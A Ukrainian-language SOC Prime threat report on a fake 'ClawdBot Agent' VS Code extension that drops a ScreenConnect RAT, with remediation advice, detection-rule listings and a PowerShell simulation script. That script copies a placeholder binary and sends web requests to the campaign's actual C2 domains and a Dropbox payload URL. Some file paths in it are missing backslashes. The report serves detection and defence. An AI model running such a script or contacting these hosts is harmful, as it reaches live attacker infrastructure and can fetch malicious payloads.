SOC Prime Bias: Критичний

28 Jan 2026 09:58 UTC

Фальшиве розширення ClowdBot для VS Code розповсюджує RAT ScreenConnect

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Фальшиве розширення ClowdBot для VS Code розповсюджує RAT ScreenConnect
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисне розширення для Visual Studio Code під назвою ClawdBot Agent видає себе за AI асистента по кодуванню, але таємно встановлює модифікований інструмент віддаленого доступу ScreenConnect на Windows при запуску VS Code. Під час запуску розширення отримує конфігураційний файл з домена, контрольованого атакуючим, потім завантажує і запускає підроблений двійковий файл VS Code (Code.exe) разом з допоміжними DLL. Як другий шлях доставки, воно може завантажити той самий інсталятор з посилання на Dropbox, щоб підтримувати доступність навантаження. Кампанія зловживає довіреним інструментом підтримки ІТ, щоб зливатися з легітимною діяльністю віддаленого адміністрування та знижувати підозри.

Розслідування

Дослідники отримали package.json розширення, підтвердили активацію при запуску VS Code і отримали віддалену JSON-конфігурацію, яка містить зловмисні компоненти. Аналіз двійкових файлів показав підписані модулі ScreenConnect, які відправляли сигнали на спеціальний релей-сервер. Додаткова логіка резервування була виявлена в JavaScript і PowerShell, з посиланнями на додаткові домени та навантаження, розміщені на Dropbox. Артефакти на диску були виявлені у папці %TEMP%Lightshot.

Захист

Видаліть розширення ClawdBot Agent з VS Code та видаліть залишкові файли з місця встановлення ScreenConnect і каталог %TEMP%Lightshot. Видаліть клієнтський сервіс ScreenConnect і блокуйте вихідні з’єднання до ідентифікованих релей-доменів та IP-адрес. Оновіть всі API-ключі або секрети, які могли бути введені у розширення.

Відповідь

Виявляйте зловмисне розширення, відстежуючи встановлення розширень VS Code та створення каталогу Lightshot. Попереджуйте про виконання Code.exe або ScreenConnect двійкових файлів з нестандартних шляхів і про вихідні з’єднання до meeting.bulletmailer.net:8041 або пов’язаних IP-адрес. Виконайте форензичний аналіз хоста, щоб підтвердити видалення постійності та виявити додаткові навантаження.

Потік атаки

Виявлення

Альтернативне програмне забезпечення для віддаленого доступу / управління (через process_creation)

Команда SOC Prime
28 січня 2026

Завантаження або вивантаження через Powershell (через cmdline)

Команда SOC Prime
28 січня 2026

Альтернативне програмне забезпечення для віддаленого доступу / управління (через audit)

Команда SOC Prime
28 січня 2026

Альтернативне програмне забезпечення для віддаленого доступу / управління (через system)

Команда SOC Prime
28 січня 2026

IOC (DestinationIP) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT

Правила SOC Prime AI
28 січня 2026

IOC (SourceIP) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT

Правила SOC Prime AI
28 січня 2026

IOC (HashSha256) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT

Правила SOC Prime AI
28 січня 2026

IOC (Emails) для виявлення: Встановлення фальшивого розширення ClawdBot VS Code інсталює ScreenConnect RAT

Правила SOC Prime AI
28 січня 2026

Встановлення помилкового розширення ClawdBot VS Code інсталює RAT ScreenConnect [Створення процесу Windows]

Правила SOC Prime AI
28 січня 2026

Виявлення встановлення фальшивого розширення ClawdBot VS Code, яке інсталює RAT ScreenConnect [Підключення до мережі Windows]

Правила SOC Prime AI
28 січня 2026

Виконання симуляції

Передумова: Телеметрія та попередня перевірка бази повинні були пройти.

Наратив атаки та команди

  1. Атакуючий публікує троянський розширення для VS Code під назвою “Clawdbot Helper”.
  2. Жертва встановлює розширення через маркетплейс VS Code, яке запускає скрипт postinstall який таємно поміщає клієнт ScreenConnect (ScreenConnect.Client.exe) в %APPDATA%ScreenConnect.
  3. Безпосередньо за встановленнямклієнт ініціює три вихідні TCP-з’єднання до доменів C2, контрольованих атакуючим, щоб отримати додаткові навантаження та повідомити про статус хоста.
  4. Вихідні з’єднання генерують записи Sysmon Event ID 3, які відповідають списку dest_ip , задовольняючи правило виявлення.

Скрипт регресійного тестування

# --------------------------------------------------------------
# Імітація зловмисної процедур установки розширення VS Code
# --------------------------------------------------------------

# Крок 1 – Помістити муляжний двійковий файл ScreenConnect (симуляція)
$payloadPath = "$env:APPDATAScreenConnectScreenConnect.Client.exe"
New-Item -ItemType Directory -Path (Split-Path $payloadPath) -Force | Out-Null
# Створення безпечного файлу-заповнювача (наприклад, копія notepad.exe)
Copy-Item -Path "$env:SystemRootSystem32notepad.exe" -Destination $payloadPath -Force

# Крок 2 – Надіслати вихідні запити до кожного хоста C2
$c2Hosts = @(
    "http://meeting.bulletmailer.net/collect",
    "http://clawdbot.getintwopc.site/payload",
    "https://www.dropbox.com/s/evilpayload.exe"
)

foreach ($url in $c2Hosts) {
    try {
        # Тиха веб-запит; -UseBasicParsing уникнення запрошень на UI
        Invoke-WebRequest -Uri $url -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null
        Write-Host "контакт з $url"
    } catch {
        Write-Host "Не вдалося сконтактувати з $url (очікувано в пісочниці)."
    }
}

# Кінець скрипту – на цей момент Sysmon повинен був зафіксувати три
# Події підключення до мережі, чиї значення DestinationIp відповідають правилу.

Команди очищення

# --------------------------------------------------------------
# Видалення симульованих артефактів
# --------------------------------------------------------------

# Зупинити будь-які залишкові PowerShell завдання (жодного в цьому простому скрипті)
Get-Job | Remove-Job -Force

# Видалити муляжний каталог клієнта ScreenConnect
Remove-Item -Path "$env:APPDATAScreenConnect" -Recurse -Force

# Опціонально очистіть буфер Sysmon (потрібні права адміністратора)
# sysmon -c